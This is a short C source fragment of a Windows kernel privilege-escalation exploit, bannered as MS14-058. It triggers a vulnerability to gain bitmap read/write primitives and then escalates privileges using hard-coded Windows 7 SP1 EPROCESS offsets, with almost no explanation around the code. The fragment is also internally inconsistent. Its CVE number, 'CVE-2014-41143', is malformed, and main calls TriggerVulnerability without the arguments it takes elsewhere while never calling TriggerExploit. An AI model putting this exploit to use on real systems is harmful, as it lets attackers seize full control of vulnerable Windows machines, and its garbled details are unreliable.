BOOLEAN TriggerExploit(VOID) {
PPEB pPeb;
HBITMAP hManager, hWorker;
EPROCESS_OFFSETS win7SP1Offsets = { 0x180, 0x208 };
LOG("\n");
pPeb = GetCurrentPeb();
if (pPeb == NULL) {
LOG("[-] Unable To Get The Current PEB\n");
return FALSE;
}
if (TriggerVulnerability(pPeb, &hManager, &hWorker) == FALSE) {
LOG("[-] Unable To Trigger Vulnerability\n");
return FALSE;
}
LOG("[+] Vulnerability Triggered\n");
LOG("[+] Bitmap Read/Write Primitives Now Available\n");
if (TriggerPrivilegeEscalation(hManager, hWorker, &win7SP1Offsets) == FALSE) {
LOG("[-] Unable To Trigger Exploit\n");
return FALSE;
}
LOG("[+] Privilege Escalation Triggered\n\n");
return TRUE;
}
INT main(UINT argc, PTCHAR argv[])
{
CONST PTCHAR banner =
" \n"
" # # ##### ####### \n"
" # # ## #### # # # # # # #### # ###### ## # #\n"
" # # # # # # # # # # # # # # # # ## ##\n"
" ####### # # # #### ##### # #### # ##### # # # ## #\n"
" # # ###### # # # # # # # # ###### # #\n"
" # # # # # # # # # # # # # # # # # # #\n"
" # # # # #### # # ##### # #### # ###### # # # #\n"
" \n"
" CVE-2014-41143 / MS14-058 \n"
" \n";
// print the banner
DEBUG_MESSAGE(banner);
TriggerVulnerability();
return EXIT_SUCCESS;
}
